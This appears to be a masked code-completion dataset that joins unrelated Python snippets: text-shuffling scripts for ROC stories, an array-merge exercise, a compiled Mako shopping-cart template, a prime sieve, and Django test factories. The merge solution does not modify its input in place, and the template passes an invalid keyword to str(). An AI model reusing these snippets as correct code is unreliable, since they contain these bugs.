random_data['%d' % (i + 1)] = np.random.permutation(random_data
['%d' % (i + 1)])
for k in range(len(post)):
idx = np.random.permutation(range(1, 5))[0]
for i in range(5):
if i == idx:
fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\n')
else:
fout.write(' '.join(data['%d' % (i + 1)][k]) + '\n')
fout.write('------\n')
| import numpy as np
import random
with open("./roc.txt", "r") as fin:
with open("./roc_shuffle.txt", "w") as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = [0] + np.random.permutation(range(1,5)).tolist()
for sen in np.take(tmp, idx).tolist():
fout.write(sen+"\n")
tmp = []
fout.write(line.strip()+"\n")
else:
tmp.append(line.strip())
with open("./roc.txt", "r") as fin:
with open("./roc_repeat.txt", "w") as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = random.randint(1,4)
tmp[idx] = tmp[idx][:-1] + tmp[idx]
for sen in tmp:
fout.write(sen+"\n")
tmp = []
fout.write(line.strip()+"\n")
else:
tmp.append(line.strip())
with open("./roc.txt", "r") as fin:
with open("./roc_replace.txt", "w") as fout:
post, tmp = [], []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
post.append(tmp)
tmp = []
else:
tmp.append(line.strip().split())
data = {"1":[], "2":[], "3":[], "4":[], "5":[]}
for p in post:
for i in range(5):
data["%d"%(i+1)].append(p[i])
random_data = data.copy()
for i in range(5):
random_data["%d"%(i+1)] = np.random.permutation(random_data["%d"%(i+1)])
for k in range(len(post)):
idx = np.random.permutation(range(1,5))[0]
for i in range(5):
if i == idx:
fout.write(' '.join(random_data["%d"%(i+1)][k])+"\n")
else:
fout.write(' '.join(data["%d"%(i+1)][k])+"\n")
fout.write("------\n") | null | [
0,
1,
2,
3
] |
28 | 4f13e2858d9cf469f14026808142886e5c3fcc85 | <mask token>
| class Solution:
<mask token>
<mask token>
| class Solution:
def merge(self, nums1, m, nums2, n):
"""
Do not return anything, modify nums1 in-place instead.
"""
if n == 0:
nums1 = nums1
if nums1[m - 1] <= nums2[0]:
for i in range(n):
nums1[m + i] = nums2[i]
elif nums1[0] >= nums2[-1]:
for i in range(m):
nums1[i] = nums1[n + i]
else:
ans = [None] * len(nums1)
i = 0
j = 0
k = 0
while i < m and j < n:
if nums1[i] <= nums2[j]:
print('take 1: ', nums1[i])
ans[k] = nums1[i]
i += 1
else:
print('take 2: ', nums2[j])
ans[k] = nums2[j]
j += 1
k += 1
nums1 = ans
<mask token>
| class Solution:
def merge(self, nums1, m, nums2, n):
"""
Do not return anything, modify nums1 in-place instead.
"""
if n == 0:
nums1 = nums1
if nums1[m - 1] <= nums2[0]:
for i in range(n):
nums1[m + i] = nums2[i]
elif nums1[0] >= nums2[-1]:
for i in range(m):
nums1[i] = nums1[n + i]
else:
ans = [None] * len(nums1)
i = 0
j = 0
k = 0
while i < m and j < n:
if nums1[i] <= nums2[j]:
print('take 1: ', nums1[i])
ans[k] = nums1[i]
i += 1
else:
print('take 2: ', nums2[j])
ans[k] = nums2[j]
j += 1
k += 1
nums1 = ans
if __name__ == '__main__':
solve = Solution()
nums1 = [1, 2, 3, 0, 0, 0]
m = 3
nums2 = [2, 5, 6]
n = 3
solve.merge(nums1, m, nums2, n)
print(nums1)
| class Solution:
def merge(self, nums1, m, nums2, n):
"""
Do not return anything, modify nums1 in-place instead.
"""
if n == 0:
nums1 = nums1
if nums1[m-1] <= nums2[0]:
for i in range(n):
nums1[m+i] = nums2[i]
elif nums1[0] >= nums2[-1]:
for i in range(m):
nums1[i] = nums1[n+i]
else:
ans = [None]*len(nums1)
i = 0
j = 0
k = 0
while i < m and j < n:
if nums1[i] <= nums2[j]:
print("take 1: ", nums1[i])
ans[k] = nums1[i]
i += 1
else:
print("take 2: ", nums2[j])
ans[k] = nums2[j]
j += 1
k += 1
nums1 = ans
if __name__ == "__main__":
solve = Solution()
nums1 = [1,2,3,0,0,0]
m = 3
nums2 = [2,5,6]
n = 3
solve.merge(nums1, m, nums2, n)
print(nums1)
| [
0,
1,
2,
3,
4
] |
29 | 57967f36a45bb3ea62708bbbb5b2f4ddb0f4bb16 | <mask token>
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
<mask token>
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
<mask token>
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| <mask token>
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
<mask token>
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| <mask token>
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = (
'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
)
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
<mask token>
_exports = ['content']
<mask token>
now = datetime.now()
noww = now.strftime('%B %d, %Y')
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n')
__M_writer('\r\n')
__M_writer(str(nowww=noww - timedelta(days=3)))
__M_writer('\r\n')
if 'parent' not in context._data or not hasattr(context._data[
'parent'], 'content'):
context['self'].content(**pageargs)
__M_writer('\r\n\r\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = (
'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
)
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
from datetime import datetime, timedelta
now = datetime.now()
noww = now.strftime('%B %d, %Y')
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n')
__M_writer('\r\n')
__M_writer(str(nowww=noww - timedelta(days=3)))
__M_writer('\r\n')
if 'parent' not in context._data or not hasattr(context._data[
'parent'], 'content'):
context['self'].content(**pageargs)
__M_writer('\r\n\r\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| # -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = 'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
from datetime import datetime, timedelta
now = datetime.now()
noww = now.strftime('%B %d, %Y')
def _mako_get_namespace(context, name):
try:
return context.namespaces[(__name__, name)]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[(__name__, name)]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n')
__M_writer('\r\n')
__M_writer(str(nowww = noww - timedelta(days=3)))
__M_writer('\r\n')
if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):
context['self'].content(**pageargs)
__M_writer('\r\n\r\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n')
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str( item.id ))
__M_writer('" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="')
__M_writer(str(STATIC_URL))
__M_writer(str( item.photo.image ))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str( noww ))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str( item.price_per_day ))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer('</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n')
if request.user.is_authenticated():
__M_writer(' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n')
else:
__M_writer(' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n')
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
"""
__M_BEGIN_METADATA
{"uri": "/account.rentalcart.html", "line_map": {"70": 8, "71": 16, "72": 17, "73": 18, "74": 18, "75": 19, "76": 19, "77": 19, "78": 20, "79": 20, "80": 21, "81": 21, "82": 22, "83": 22, "84": 25, "85": 29, "86": 30, "87": 31, "88": 32, "89": 34, "95": 89, "33": 0, "16": 2, "45": 1, "46": 6, "47": 7, "48": 7, "53": 36, "59": 8}, "filename": "C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html", "source_encoding": "ascii"}
__M_END_METADATA
"""
| [
3,
4,
6,
7,
8
] |
30 | 5771f49ad5254588f1683a8d45aa81ce472bb562 |
def prime_sieve(n):
if n==2: return [2]
elif n<2: return []
s=range(3,n+1,2)
mroot = n ** 0.5
half=(n+1)/2-1
i=0
m=3
while m <= mroot:
if s[i]:
j=(m*m-3)/2
s[j]=0
while j<half:
s[j]=0
j+=m
i=i+1
m=2*i+3
return [2]+[x for x in s if x]
ps = prime_sieve(1000000)
def get_primes_upto(n):
i = 0
while ps[i] <= n:
i += 1
return ps[0:i+1];
def trial_division(n):
if n == 1: return [1]
primes = get_primes_upto(int(n**0.5) + 1)
prime_factors = []
for p in primes:
if p*p > n: break
while n % p == 0:
prime_factors.append(p)
n //= p
if n > 1: prime_factors.append(n)
return prime_factors
def unique_factors(n):
return len(set(trial_division(n)))
fs = [0]
c = 0
for i in range(1,1000000):
c+= 1
fs.append(unique_factors(i))
if len(fs) > 4:
if fs[-4:] == [4,4,4,4]:
print c -3
break
| null | null | null | null | [
0
] |
31 | 44d87f112ab60a202e4c8d64d7aec6f4f0d10578 | <mask token>
class IssueTitleFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| <mask token>
class JournalFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| <mask token>
class UseLicenseFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
init_num = u'1',
subject_descriptors = (
u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA"""
.strip())
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = (
u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
)
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| <mask token>
class UserFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class GroupFactory(factory.Factory):
FACTORY_FOR = Group
name = factory.Sequence(lambda n: 'Group #%s' % n)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = (
u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
)
email = '[email protected]'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = (
